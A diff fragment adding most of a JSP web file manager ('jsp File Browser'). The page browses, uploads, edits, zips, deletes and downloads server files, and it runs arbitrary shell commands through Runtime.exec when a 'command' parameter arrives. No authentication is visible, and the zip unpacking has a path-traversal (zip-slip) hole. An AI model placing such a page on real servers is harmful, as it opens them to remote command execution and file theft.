} + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println("" + conv2Html(entry.getName()) + + ""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ 